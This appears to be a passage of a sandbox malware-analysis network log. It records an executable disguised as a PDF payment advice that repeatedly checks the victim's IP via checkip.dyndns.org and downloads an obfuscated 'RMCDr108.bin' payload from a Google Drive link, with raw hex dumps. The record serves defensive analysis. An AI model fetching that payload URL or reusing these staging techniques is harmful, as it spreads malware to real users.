                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: e3ba52c25d4d4ec027f0fd02e61d023f
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.449856193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:41.095355034 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:42.380191088 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:42 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 1c9789460d139004d0bb1ecfd250164c
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.449867193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:44.686892986 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:45.954668999 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:45 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 88e618f78fe1c034d1aed5f3ffe4ce3c
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.449876193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:48.089977026 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:49.357676029 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:49 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 40595dc0506497b0b6148a2db2b9cbab
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.449887193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:51.574583054 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:52.841837883 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:52 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 93ec33b03b52766656fba58a3645cb9b
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.449895193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:55.106069088 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:56.376523018 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:56 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: d9d75259b4dd61e4f8ae80b52bbe7a8c
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.449905193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:58.511513948 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:30:00.399445057 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:30:00 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: fc66204c918ce3550811846be0b6023c
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.449917193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:30:02.917160034 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:30:07.227844000 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:30:07 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 6c8c7c01ca96c6139f17c5b872c35457
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.449934193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:30:09.410159111 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:30:13.822424889 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:30:13 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 18200dadf6cfe9b70da973aa44e2c5ef
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449736172.217.17.464437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:28:45 UTC216OUTGET /uc?export=download&id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Host: drive.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-19 14:28:46 UTC1920INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Thu, 19 Dec 2024 14:28:45 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'nonce-Lrq2uHZttz-dWvPlUAPnjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449737172.217.17.654437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:28:47 UTC258OUTGET /download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=download HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:28:52 UTC4921INHTTP/1.1 200 OK
                                                                                                              X-GUploader-UploadID: AFiumC6nm7E0xRaPU5qyJVQBBbBKS_spXjvjhTQhKvKjiRE4Kc69Fm_vt41NTdgS_pBiOZPJGUKKZ2A
                                                                                                              Content-Type: audio/mpeg
                                                                                                              Content-Security-Policy: sandbox
                                                                                                              Content-Security-Policy: default-src 'none'
                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Content-Disposition: attachment; filename="RMCDr108.bin"
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 94272
                                                                                                              Last-Modified: Sun, 15 Dec 2024 10:09:45 GMT
                                                                                                              Date: Thu, 19 Dec 2024 14:28:51 GMT
                                                                                                              Expires: Thu, 19 Dec 2024 14:28:51 GMT
                                                                                                              Cache-Control: private, max-age=0
                                                                                                              X-Goog-Hash: crc32c=49HZaQ==
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
                                                                                                              2024-12-19 14:28:52 UTC4921INData Raw: ff f7 6d f6 38 d4 0d 4d 92 23 33 76 3a d2 27 71 99 02 29 bf 88 ec a2 56 cc 84 92 11 c0 71 48 36 5e 86 4a dd b4 7a 98 b8 d9 64 55 48 25 ec 5a f7 a2 71 a0 ba 24 7c 75 d6 a1 9f 1f e6 f0 f7 c3 69 03 2a f6 8d 32 1e de a2 d4 9a eb cc f9 87 c3 ec 8d 37 47 ab 31 15 cd 59 4d cd 5f c6 a2 78 27 28 c6 b5 fd ba f9 1e 37 51 f5 6b 39 e0 0e 9e 9d 0c d6 96 2c a2 bc 5e cb 92 a7 5c 0a b0 da 8c 17 90 c7 ee e8 dd 27 17 55 5f 31 24 30 9b c7 76 a2 42 8f 0d 59 95 96 38 a5 cd 9e c5 7f 29 e4 e9 07 8f b4 26 a6 3f 26 36 26 8e 03 66 27 40 9f 58 ac ba 9b a5 f2 f1 86 0a c7 09 83 79 50 b7 08 a3 79 82 a1 7a 4e 96 55 8f 0e 2b b3 9c d1 e9 9f bc ea d7 6e 97 84 fc 43 af 49 03 ff 86 4f a7 f2 b5 aa 5a 57 23 8e 9a 4f fe 78 4c 63 0c 6e 57 25 a0 9e 30 11 d0 c3 e8 53 ec 66 59 46 2b e7 59 e2 7a 6c
                                                                                                              Data Ascii: m8M#3v:'q)VqH6^JzdUH%Zq$|ui*27G1YM_x'(7Qk9,^\'U_1$0vBY8)&?&6&f'@XyPyzNU+nCIOZW#OxLcnW%0SfYF+Yzl
                                                                                                              2024-12-19 14:28:52 UTC4855INData Raw: a4 54 c0 a3 c0 2f f9 5f c3 96 49 70 a0 f0 b5 3c db 41 94 04 11 db e5 50 4f 37 15 3f 31 e2 f7 69 4a aa f4 7a d3 b0 05 aa 90 5d 60 2c c5 16 e0 da 61 e2 6d 96 70 02 9b 02 18 26 81 5e 9d 5b 02 05 e1 08 0e ba 1d bd 75 01 e3 14 16 85 4a ea bc cb 0a b3 ca b1 c8 1c 4e 65 39 45 5f b4 10 f8 84 ee 16 6f c5 e2 ca f2 14 8b 96 04 ab eb d6 ea 55 b7 50 95 a8 b5 b7 67 2d b9 d1 d6 d3 e4 0d 50 10 72 18 a7 8a 59 a5 87 92 01 f6 2e 31 9d 9c b6 88 18 7a d1 44 19 3d 70 e7 b0 aa 5b c3 d1 17 07 cc cc a2 04 f7 b4 ce 5a af a0 71 4a d2 91 8f 61 a4 44 a4 92 ca d6 8f 3b 1f e9 a2 64 58 d6 0d f2 89 9f 4a 50 08 f4 d4 bd 31 d2 a7 3d 2e 13 9b 7f e4 94 7f ab fc f4 61 f4 4f 3b 36 29 b4 fe 06 55 ff 16 b0 6c cf 95 61 bd 05 46 9c 2d 47 ae 3c ae 32 86 ff de 02 21 91 2b 3f 38 a6 ad a4 56 9a 8d 48
                                                                                                              Data Ascii: T/_Ip<APO7?1iJz]`,amp&^[uJNe9E_oUPg-PrY.1zD=p[ZqJaD;dXJP1=.aO;6)UlaF-G<2!+?8VH
                                                                                                              2024-12-19 14:28:52 UTC1323INData Raw: 1b 21 53 8e 21 39 e0 0a 9c e6 47 d6 96 28 8a 6e 5e cb 98 a7 5e 0f 3e 33 f1 5a 90 c9 f5 50 d1 5c ee 5c 92 14 b4 e0 d7 0a 5d 8b 66 e6 7e 7d e5 e4 7d c2 bf ff bb 6f 48 85 1d 69 e0 c0 22 c4 5a 17 44 51 9b 65 0f 49 64 a5 44 ff 9a fc e2 c2 94 a8 0d c0 05 b4 7d 41 b3 24 ae 7b f9 b7 3f 4e 92 31 5d 0d 2b 0e a6 a4 58 9d c7 a0 d7 6e 93 fa af a3 af 41 2a a0 87 1f ad f9 d4 b8 5f 46 2e a2 97 4d 85 32 4c bd 8d 47 84 25 80 94 30 11 70 c0 93 1b ec 26 5d 38 58 e7 59 e8 50 38 d8 27 e6 9b 9b a1 a7 9d 12 5d fb 89 bb 26 96 0e ea 47 26 1d 26 87 c5 b5 73 e4 b7 75 24 f4 c0 71 46 66 84 cb 4a 35 b1 93 0e 81 e1 37 35 5b 7b de 57 a5 94 f8 37 f0 eb a0 5e 5b 7b c0 ba f3 bc f9 b6 3f 76 e3 0b 6a 76 0b d2 0d 86 43 44 89 8d b6 fa 96 d4 9b 5a ac 34 14 d9 a4 84 fc a8 31 0b 65 e4 18 bf 17 41
                                                                                                              Data Ascii: !S!9G(n^^>3ZP\\]f~}}oHi"ZDQeIdD}A${?N1]+XnA*_F.M2LG%0p&]8XYP8']&G&&su$qFfJ575[{W7^[{?vjvCDZ41eA
                                                                                                              2024-12-19 14:28:52 UTC1390INData Raw: 64 36 42 fd 54 b7 07 96 b6 e1 64 15 7d db 82 d3 34 03 c0 c7 61 0e 79 83 00 9d c6 45 de 0f a6 4a ad c7 e7 3e 36 e8 da 37 d3 1d 93 7e 1a bc c9 2b 20 99 6a 67 44 c5 7b ed c7 48 91 04 a7 8b 91 c9 d3 79 cc 8e 09 fd 0c d0 8b 80 57 7c 61 2e f9 50 a0 cd 1b 66 84 6c 72 13 e5 0d da 78 a6 3e 8e 90 02 cd 3b 57 72 57 96 66 e2 5f ee 5b ae 1e c9 7c a5 73 de cb 82 8c 26 57 c0 f3 ac 51 13 00 04 f6 00 e3 b5 03 32 1c be 03 4c 63 dd ee 93 e5 b1 e1 34 21 e7 9e f4 0d 19 44 e9 d1 d5 05 22 b9 e8 e9 9d 19 d6 dd c2 64 a3 f4 17 cc df 81 a0 b0 04 e4 24 73 85 91 89 90 61 c1 e4 d6 7b 49 20 4d bf bd 17 0f 2e 25 e6 53 98 0d c0 09 fb c6 8b 5f 05 04 40 61 50 61 f2 9e d6 23 f5 ee 01 f9 0d 42 3e b9 1c b1 1c c1 1b 3c cb 94 58 24 ee 1e 6a 58 df de 19 fc df 7d ce 1e c5 b0 1f 74 6b df 8e 64 02
                                                                                                              Data Ascii: d6BTd}4ayEJ>67~+ jgD{HyW|a.Pflrx>;WrWf_[|s&WQ2Lc4!D"d$sa{I M.%S_@aPa#B><X$jX}tkd
                                                                                                              2024-12-19 14:28:52 UTC1390INData Raw: b3 3a f6 28 52 78 2b 90 25 48 70 b6 05 78 02 3d e6 6a ef 8a 59 de 01 a7 43 a0 f6 99 a4 73 b8 49 fc e0 f3 69 0d 3a a0 24 a5 b7 22 8b 38 b3 dd 11 f9 7a b5 91 55 99 70 48 9c 9d ee 8e b6 1c eb 8f d5 ac 31 02 9d 5c fa 1b 35 cf 5a 66 eb d5 88 8d 35 8c bc 31 f2 ad 18 66 d9 da 03 8b 0a 03 72 92 2c c8 23 92 a2 ec 7b 69 ca 75 b1 c9 9d 15 e2 b6 99 5f e3 4a be 83 ff 32 a2 0c 8b 69 1d 9f f4 35 15 89 71 06 9e 1f 6c 12 a3 87 05 dc a9 8f 89 1f 09 d7 f7 e0 5d 9a 3e 7b ca c9 f9 74 ad e4 b6 a7 6a 89 66 96 cf 01 48 18 c6 13 9d f6 99 aa cb b9 39 26 5c 37 bf ea dd 61 bc e9 a8 2d c1 17 e4 05 11 d1 f9 4f 54 3f 0c a5 49 96 ec 41 8e a0 f4 79 af d9 14 b4 88 42 36 fb c5 16 ee da a4 e2 6d 96 63 ca e5 e0 14 0a f6 44 d2 4b 14 77 69 12 d2 14 61 6b 5d 32 e9 39 12 87 58 98 06 83 0a c3 af
                                                                                                              Data Ascii: :(Rx+%Hpx=jYCsIi:$"8zUpH1\5Zf51fr,#{iu_J2i5ql]>{tjfH9&\7a-OT?IAyB6mcDKwiak]29X
                                                                                                              2024-12-19 14:28:52 UTC1390INData Raw: b4 96 aa d4 9b 6f d2 0a 05 d9 a2 88 0d b3 31 7f 65 23 18 bf 1b 41 d6 e1 80 c3 14 28 5f 4e a3 82 be 6d 3f ac f9 8e 19 b9 48 b0 59 69 5f 88 e0 b1 6f 67 98 99 30 1c 51 99 2e 09 0a cf 63 30 29 01 13 0e 95 93 2f 8b 52 75 66 9a 8d 36 a6 b3 3f b0 11 3f 47 f5 25 ee 45 88 a7 46 cd 23 61 87 0a 21 3a 2b 51 34 87 51 a5 6b 78 47 3d fc 1e ea f9 d2 fc 81 3e 1d ee e2 1a c6 91 0c 00 8b da 12 b2 e5 16 dd fd 7f 8d 7b a3 6c d4 8c 6f 2f 4f b1 fb 07 cc 4b 4a c4 cf 08 0e 6d 73 06 ee 7b fb a6 08 24 24 cc fc f5 0c 29 bc a4 4d 77 c7 75 ea 26 a6 30 cb ae 64 11 78 96 4b a2 ed 1a a6 40 03 f9 c3 d0 58 56 8d 1d 31 89 d7 03 84 54 2b 9a 70 25 be 51 6b 46 c0 48 76 f8 42 af 9b 01 91 7d d4 56 c9 2c 4d db e6 10 00 4d 44 d6 dd de ce 76 4c d0 8e 38 af b6 1f 6e bc f0 28 d9 09 bf 27 05 2f 8d 25
                                                                                                              Data Ascii: o1e#A(_Nm?HYi_og0Q.c0)/Ruf6??G%EF#a!:+Q4QkxG=>{lo/OKJms{$$)Mwu&0dxK@XV1T+p%QkFHvB}V,MMDvL8n('/%
